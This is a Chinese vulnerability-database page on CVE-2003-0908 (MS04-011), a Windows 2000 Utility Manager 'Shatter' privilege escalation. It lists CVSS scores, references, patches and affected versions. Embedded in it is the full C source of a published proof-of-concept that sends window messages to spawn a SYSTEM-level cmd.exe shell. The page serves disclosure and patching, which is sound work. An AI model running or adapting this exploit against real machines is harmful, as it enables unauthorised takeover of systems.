CVE-2003-0908
CVSS7.2
发布时间 :2004-06-01 00:00:00
修订时间 :2008-09-10 15:20:54
NMCOES    

[原文]The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213.


[CNNVD]Microsoft Windows工具管理器权限提升漏洞(MS04-011)(CNNVD-200406-015)

        
        Microsoft Windows 2000包含工具管理器用于计算机,性能服务等管理。
        工具管理器在启动执行应用程序时存在权限提升,本地登录用户可利用此漏洞以系统权限启动任意应用程序而控制系统。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1046Windows Utility Manager Shatter Message Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0908
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-015
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/526084
(VENDOR_ADVISORY)  CERT-VN  VU#526084
http://www.us-cert.gov/cas/techalerts/TA04-104A.html
(VENDOR_ADVISORY)  CERT  TA04-104A
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
(VENDOR_ADVISORY)  MS  MS04-011
http://www.appsecinc.com/resources/alerts/general/04-0001.html
(VENDOR_ADVISORY)  MISC  http://www.appsecinc.com/resources/alerts/general/04-0001.html
http://archives.neohapsis.com/archives/vulnwatch/2004-q1/0082.html
(UNKNOWN)  VULNWATCH  20040414 [SHATTER Team Security Alert] Microsoft Windows Utility Manager Vulnerability
http://xforce.iss.net/xforce/xfdb/15632
(UNKNOWN)  XF  win2k-utilitymgr-gain-privileges(15632)
http://www.securityfocus.com/bid/10124
(UNKNOWN)  BID  10124
http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5LP0C2ACKU.html
http://www.ciac.org/ciac/bulletins/o-114.shtml
(UNKNOWN)  CIAC  O-114

- 漏洞信息

Microsoft Windows工具管理器权限提升漏洞(MS04-011)
高危 访问验证错误
2004-06-01 00:00:00 2005-10-31 00:00:00
本地  
        
        Microsoft Windows 2000包含工具管理器用于计算机,性能服务等管理。
        工具管理器在启动执行应用程序时存在权限提升,本地登录用户可利用此漏洞以系统权限启动任意应用程序而控制系统。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 建议关闭工具管理服务。
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-011)以及相应补丁:
        MS04-011:Security Update for Microsoft Windows (835732)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

        补丁下载:
        Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service Pack 3, and Microsoft Windows 2000 Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en

- 漏洞信息 (271)

MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) (EDBID:271)
windows local
2004-04-15 Verified
0 Cesar Cerrudo
N/A [点击下载]
// By Cesar Cerrudo cesar appsecinc com
// Local elevation of priviliges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h> 
#include <windows.h> 
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[]) 
{ 
  HWND lHandle, lHandle2;
  POINT point;

  char sText[]="%windir%\\system32\\cmd.ex?";

  // run utility manager
  system("utilman.exe /start");
  Sleep(500);

  // execute contextual help
  SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
  Sleep(500);

  // open file open dialog windown in Windows Help
  PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
  Sleep(500);

  // find open file dialog window
  lHandle = FindWindow("#32770","Open");

  // get input box handle
  lHandle2 = GetDlgItem(lHandle, 0x47C);
  Sleep(500);

  // set text to filter listview to display only cmd.exe
  SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
  Sleep(800);

  // send return
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

  //get navigation bar handle
  lHandle2 = GetDlgItem(lHandle, 0x4A0);
  //send tab
  SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
  Sleep(500);
  lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
  //get list view handle
  lHandle2 = GetDlgItem(lHandle2, 0x1);

  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
  SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
  Sleep(500);
  
  // popup context menu
  PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
  Sleep(1000);

  // get context menu handle
  point.x =10; point.y =30;
  lHandle2=WindowFromPoint(point);

  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);   // move down in menu
  SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

  SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

  return(0);
}




// milw0rm.com [2004-04-15]
		

- 漏洞信息

5254
Microsoft Windows Utility Manager Privilege Escalation
Local Access Required Authentication Management
Loss of Integrity

- 漏洞描述

Windows contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when Utility Manager is launched, and does not release System privileges. An attacker may be able to cause Utility Manager to launch an application under System privileges, leading to a loss of integrity.

- 时间线

2004-04-13 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Utility Manager Local Privilege Escalation Vulnerability
Access Validation Error 10124
No Yes
2004-04-13 12:00:00 2007-10-02 06:09:00
Discovery of this vulnerability has been credited to Brett Moore, Cesar Cerrudo, and Ben Pryor.

- 受影响的程序版本

Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers

- 漏洞讨论

Microsoft Utility Manager is prone to a local privilege-escalation vulnerability that may allow a local attacker to execute arbitrary code with SYSTEM privileges.

- 漏洞利用

A proof-of-concept exploit has been supplied:

- 解决方案

Microsoft has released a security bulletin and fixes to address this issue. Please see the references for more information.


Microsoft Windows 2000 Server SP2

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows 2000 Advanced Server SP2

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Server SP3

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Professional SP2

Microsoft Windows 2000 Professional SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站